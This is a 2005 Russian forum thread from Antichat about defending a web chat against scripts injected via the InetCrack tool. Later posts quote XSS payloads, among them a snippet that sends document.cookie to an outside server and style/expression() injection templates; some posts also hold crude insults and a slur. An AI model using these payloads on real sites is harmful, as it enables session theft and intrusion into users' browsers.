Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Защита от Inet Cracká (https://forum.antichat.xyz/showthread.php?t=5491)

AGRESSOR 16.03.2005 05:51

Защита от Inet Cracká
 
Как можно защититься от Inet Cracka, сидя в чате??? Может, знает кто-нибудь????

censored! 16.03.2005 20:17

А какие скрипты встраивают?

Навископом перехватывают пакеты - какие отсылаются/принимаются вами. А ИнетКряком эти самые пакеты модифицируются и засылаются вам обратно "по всем правилам".

Чтобы все было хорошо - переписывайте свой чат. А конкретно - фильтрацию пришедших к вам ЛЮБЫХ данных.

KEZ 16.03.2005 23:34

Странный вопрос...
InetCrack - программа для отсылки любых HTTP пакетов на сервер...
Как от нее можно ЗАЩИТИТЬСЯ?

(-=util=-) 17.03.2005 03:22

Ставить антифлудер. Задержку отправления сообщения. и всё пучком.

AGRESSOR 17.03.2005 05:00

Цитата:

Сообщение от censored!
А какие скрипты встраивают?

Навископом перехватывают пакеты - какие отсылаются/принимаются вами. А ИнетКряком эти самые пакеты модифицируются и засылаются вам обратно "по всем правилам".

Чтобы все было хорошо - переписывайте свой чат. А конкретно - фильтрацию пришедших к вам ЛЮБЫХ данных.

Честно говоря, я себе эту грустную ситуацию так себе и представлял... И чат рвались переписать уже многие, очень многие... А хочешь, щас сделаю ситуацию ещё безнадёжнее??? У нас там админа на чате - нету ни фига... И пароль от админы не знает никто.
А что касается скриптов... Видишь, я в этом деле не очень хорошо разбираюсь, могу тебе лишь сказать, что специально для этих целей - подвесить броузер - была создана страница dad-ie.narod.ru. Страничка убивает ЛЮБОЙ БРОУЗЕР. Мозилла летает, как помойная тряпка.
Насколько я понял, "шутник" посылает в привате скрипт с переадресацией на эти самые убойные страницы... И виснет тогда у тебя броузер, и дисковод постоянно трещит... А вообще, я так понял - чат - дыра просто, он почти любой скрипт пропустит, какой хочешь. Я эти скриптов - во насмотрелся! Ещё дёрнули скрипт с античата - Multiple windows - он Касперским распознаётся как NoClose троян. Вот так грустно всё.

AGRESSOR 17.03.2005 05:07

Цитата:

Сообщение от KEZ
Странный вопрос...
InetCrack - программа для отсылки любых HTTP пакетов на сервер...
Как от нее можно ЗАЩИТИТЬСЯ?

Опять же можно... Я кажется запамятовал упомянуть один интересный факт... Когда сидишь под старым Netscap ом 4-ой версии, то скрипты до тебя практически не доходят.... То есть, отсюда вывод: Нетскейп части скриптов - вообще не видит! Только им и спасаюсь. Попробовал Netscape 7.2, Мозилу 6-ой версии, Оперу 7.5 и 8.1, Avant, Netcaptor (последние, скорее являются просто скинами для ИЕ) - всё бесполезно. Ну, ественно, отключал вообще всё, кроме сессионных куков - актив икс, скрипты, и т.д. Всё-равно не помогали. Так как же можно сделать так, чтобы компьютер пользователя не видел большинства скриптов? И это с учётом того, что доступа к админе (см. выше) у нас нет...
ЗЫ. Аутпост агнитум - не помогает, да и как он может помочь, коли всё дело в броузере???

White Jordan 17.03.2005 05:10

ВОТ КАК У ВАС ВЕСЕЛО!!!!! :eek:

КЛЁВА!!!! :cool: Я обожаю и сам делать такие бяки. =)

AGRESSOR 17.03.2005 05:25

Цитата:

Сообщение от (-=util=-)
Ставить антифлудер. Задержку отправления сообщения. и всё пучком.

Ээээ.... уважаемый.... дело-то не во флуде вовсе было... Хотя и он с помощью Инэт-кряка становится возможней возможного.

White Jordan 17.03.2005 05:30

Ну и всё значит. Займитесь делом и перестаньте убивать свою жизнь на нете. :cool:

censored! 17.03.2005 15:01

Проблема не в Браузере, а в Чате. Браузер выполняет и отображает только то - что ему дают отобразить. Вот и ищите Админа и просите его переписать чат. Пусть ВСЕ ПЕРЕДАННОЕ скриптам Чата ставит на фильтрацию. Можно, например, если встретит в мессаге английские буквы: "a", "A", "o", "O", "e", "E", "c", "С", "M" переконвертировать их в русские буквы, которые визуально идентичны. Можно вырезать/подменять всякие символы: | : ; / \ %
И, я думаю, этого пока будет достаточно.
...
Надо смотреть Чат, какие там используются скрипты и т.п. И после этого поотключать в браузере всякие редиректы/переходы, АктивыИксы, Джаву и т.п. Но выполнение сценариев просто так не отрубить. Так как чат наверняка использует Джаву.
...
Почему Оутпост не поможет? Ну и настройте его на вырезание всяких перенаправлений, ифреймов и т.п. переходов.

kyzmi4 17.03.2005 18:50

Да, прикольная страничка. Но подвесить она меня несмогла, ну кроме Ослика. Прочсто долго думал пока не завершил операцию.

DareDEVIL 17.03.2005 20:30

а что вообще за чат такой?

AGRESSOR 18.03.2005 07:28

Цитата:

Сообщение от kyzmi4
Да, прикольная страничка. Но подвесить она меня несмогла, ну кроме Ослика. Прочсто долго думал пока не завершил операцию.

О!!! Ответь, пожалуйста, как это ты смог устоять??? Другая операционка? Спецовый плагин к какой-нибудь опере, или модный файерволл, о котором я ещё не знаю????? А как насчёт всех остальных скриптов - выдерживаешь, нет???

vai para o caralho 18.03.2005 10:28

Цитата:

Сообщение от AGRESSOR
О!!! Ответь, пожалуйста, как это ты смог устоять??? Другая операционка? Спецовый плагин к какой-нибудь опере, или модный файерволл, о котором я ещё не знаю????? А как насчёт всех остальных скриптов - выдерживаешь, нет???

Да,скинь адресок.Потестировать. :p

AGRESSOR 19.03.2005 05:59

Адрес чата скинуть не могу - боюсь, припрётся толпа, и начнёт его ломать с ещё большим энтузиазмом. Типо, практика для детсада. А что до страничек - вот их адрес: dad-ie.narod.ru, но ведь проблема-то не в том, чтобы от СТРАНИЦ блокирнуться, а проблема в том, что через чат проходит практически любой скрипт\настройки - вплоть до изменения общего фона в чате, ну там, искажение фона и прочих игрушек. Так что увы. Как я уже понимаю, сейчас проблема стоит тока в броузере.

JazzzSummerMan 20.03.2005 15:31

Я бы посоветовал попробовать отключать показ картинок в браузере. Потому что большя часть Xss на этом и строится как раз. Вспомните пример взлома Чата мэйл.ру от скальпеля. Чтобы защититься от того конкретного примера, можно было просто отключить графику

Че Гевара 20.03.2005 16:29

Цитата:

Вспомните пример взлома Чата мэйл.ру от скальпеля. Чтобы защититься от того конкретного примера, можно было просто отключить графику
Это бы не спасло ...
Картинка там загружалась посредством яваскрпта, а не только через стандартный img src ...
Образно говоря, броузер "не знал" что загрузит ... Можно было бы впинуть скрипт через любой обработчик (онклик не рационален =) )

KEZ 20.03.2005 20:51

Согласен.
Не только через картинку можно вставить сниффер

JazzzSummerMan 21.03.2005 01:56

Нафига что-то опровергать если не уверен в своей правоте, или если вообще не понимаешь о чем идет речь
Диман
не важно как на странице появляется картинка. если отключена графика, то ничего не получится. попробуй сам в IE. в мозиле не знаю можно убирать картинки или нет. то же самое относится к атрибуту style со значением backgrpund

KEZ
во-первых я написал что это просто один из вариантов. Во-вторых через картинки на самом деле произвоодится бОльшая часть xss-атак. А лучше сам научи как защитить клиент от той атаки, если адрес чата не распространяется.

AGRESSOR 21.03.2005 02:16

Цитата:

Сообщение от KEZ
Согласен.
Не только через картинку можно вставить сниффер

Да, коллега, полностью с вами согласен.. картинки - это далеко не выход, а этому летнему джазисту можно пожелать от души идти и играть джаз. Надеюсь, в музыке он больше шарит.
ИТАК, КОЛЛЕГИ. ЧТО Я ОБНАРУЖИЛ ЗА ПРОШЕДШИЕ ВЫХОДНЫЕ.
Мысль была настолько проста, что я успел обозвать сам себя кретином очень много раз... В общем. На чате орудуют ничем иным, как java-scriptom. У Netscape 476, как у очень древней версии, поддерживающей и пытающейся продвинуть свои собственные стандарты (не будем забывать, это то далёкое время, когда Netscape был королем, и пытался трепыхаться с каким-то своим стандартом) ОН ПРОСТО НЕ ИМЕЕТ ПОДДЕРЖКУ ДЖАВА СКРИПТОВ КАК ТАКОВЫХ - ВООБЩЕ.
А если в дополнительных свойствах ИЕ отключать джава-скрипты. то всё-равно ничего не получается. Однако... если взять Мозиллу.... файерфокс скажем... Или даже оперу (кстати, удивительно уёбищный броузер, такая дутая реклама, и такой обрез на возможностях) то.. Проблема решается!!!! Ураа!!! Седлай коня, дорогая, решение я нашёл, скоро вернусь домой с войны. Ан нет. С ПОДДЕРЖКОЙ РУССКИХ ШРИФТОВ И КОДИРОВОК У ОПЕРЫ И ФАЙЕРФОКСА - ПОЛНАЯ ЖОПА. Ну, вообще то есть. Есть спецовые проги для оперы. для файерфокса. Но всё-равно остаются пару косых, которые лично я вообще не могу подправить!!!!! Увы.. это уже обсуждение для другой темы форума..... Спасибо всем тем, кто ответил. вы подарили мне массу размышлений... если кто-то знает ещё какие-нибудь способы защиты. пожалуйста. пишите сюда. Очень буду признателен.

JazzzSummerMan 21.03.2005 02:59

Цитата:

Сообщение от agressor
Да, коллега, полностью с вами согласен.. картинки - это далеко не выход, а этому летнему джазисту можно пожелать от души идти и играть джаз.

хехе, посмеялся)
А если по делу, ты лучше слушай что тебе советуют. дело в том что твои глуповатые соображения давно грамотно описаны в мануалах по клиентским скриптам и всем известны

AGRESSOR 21.03.2005 03:25

БУГА-ГА-ГА-ГА!!!! БУ-ГА-ГА!! И ЭТО МНЕ ГОВОРИТ ЧЕЛОВЕК, КОТОРЫЙ НЕ УМЕЕТ ОТКЛЮЧАТЬ КАРТИНКИ В МОЗИЛЛЕ!!!! :p :p :D Т

White Jordan 21.03.2005 03:33

Не знаю о чём ты. Он тут самый лучший хакер на античате. Если бы ты понимал с кем ты говоришь ты бы слушал его советы и так бы не говорил.

JazzzSummerMan 21.03.2005 03:33

гы гы гы иди от ИнетКрэка защиту ищи, лолик))

AGRESSOR 21.03.2005 03:57

ХО-ХО-ХО))))))))))) Я НЕ УСТАЮ С СЕБЯ ПОРАЖАТЬСЯ)))) ТОЛЬКО ТАКОЙ ОТЪЯВЛЕННЫЙ ЧЁРТ, КАК Я, МОЖЕТ ЗАЛУПИТЬ НА САМОГО ГЛАВНОГО БУКВАЛЬНО С ПЕРВОГО ЧАСА ЗНАКОМСТВА, ТАК ЧТО Я ТУТ САМЫЙ КРУТОЙ))) НУ А РАЗ УЖ НАШ МЕГА-ХАКЕР ЗАПАМЯТОВАЛ ОБ КАРТИНКАХ МОЗИЛЛЫ, ТО ВСЁ-РАВНО.
1) НЕ-А. ОТКЛЮЧЕНИЕ КАРТИНОК - НЕ ПОМОГАЕТ, ПРОБОВАЛИ УЖЕ. ПРАВДА, САМ СКРИПТ ОТОБРАЖАЕТСЯ В ЧАТ-ЛИСТЕ ДЕЙСТВИТЕЛЬНО КАК НЕРАСКРЫТАЯ КАРТИНКА.
2) ВСЁ-ТАКИ ЕСТЬ РЕДКИЕ СКРИПТЫ, НА КОТОРЫХ ЭТО КАНАЕТ, НО, ВИДИМО, У НАС ТАКИМИ - НЕ ГАСЯТ. ГАСЯТ - ДРУГИМИ.

JazzzSummerMan 21.03.2005 04:41

Agressor
ну хуле, теперь все понятно ты не отъявленый черт а отчаяный пидар и дурачок))

White Jordan насчет самого лучшего хакера - разумеется не я, это даже как-то не очень смешно

White Jordan 21.03.2005 05:07

Я не говорил это для смеха. Я читал очень многие вещи на античате. На форуме тоже много читал сравнив всех, Я просто пришол к выводу из фактов что ты и есть самый лучший хакер на античате. Это совсем не для смеха было сказанно. Просто когда человек достигает высоких уровней независимо от специальности которой он занимается, он не замечает свой уровень. Это уже даказынный факт. Ты просто не замечаешь себя и в себе что и даказывает правильность моей теории что ты самый лучший хакер на античате. Плюс достаточно прочитать твои стать, посты т.д. и сравнив их со статьями других людей, (Если человек не ослеп) сразу будет видно что это так.

KEZ 21.03.2005 09:06

Да, White Jordan, ты у нас филосов))

Вообщето у тебя репутация клоуна

Че Гевара 21.03.2005 15:29

Цитата:

Сообщение от JazzzSummerMan
Нафига что-то опровергать если не уверен в своей правоте, или если вообще не понимаешь о чем идет речь
.

Ладно, давай разберемся ...
Отключение картинок означает что браузер не будет обрабатывать атрибут src тега IMG вот и все.
Например
Код HTML:

<img src=javascript:alert('ok')>
Такой способ загрузки скрипта, естественно не сработает, как и этот:
Код HTML:

<script>img=new Image();img.src="javascript:alert();"</script>
Но скрипт можно запустить не только с помощью картинок, так ведь ? Что мешает использовать IFRAME или Onload ? Я говрю про пример скальпеля ... Я не знаю, что ты зациклился на этом img ...

Algol 21.03.2005 15:39

Если речь идет о примере
Код HTML:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
То в таком случае как раз браузер ЗНАЕТ что загружает картинку, поскольку загрузка производится через объект Image(). Т.е. отключение отображения картинок приводит к тому, что этот скрипт не работает.

JazzzSummerMan 22.03.2005 01:33

В случае скальпеля это было возможно(правда все использовали именно Image()). Но в других случаях тэги не пропускаются обычно, мы используем атрибуты. И значение атрибута как раз -- скрипт. <font color="#000000" ВПИСЫВАЕМ_СВОИ_ЗНАЧЕНИЯ>НИ _В_ЧАТЕ</font>
ВПИСЫВАЕМ_СВОИ_ЗНАЧЕНИЯ - это style или например onMouseOver. Лучше естественно style. А раз стиль, то единственный фактически стандартный способ запустить скрипт background. это только кажется что способов куча, а на практике восновном связано с графикой. Приблизительно так.
http://antichat.ru/crackchat/index.html

Algol 22.03.2005 12:21

На самом деле есть хороший способ не связанный с графикой: функция expression.)
Например:
Код:

<font style=top:expression(alert())>XSS</font>

JazzzSummerMan 22.03.2005 14:54

совершенно верно). жаль он поддерживается Ie только


Время: 07:26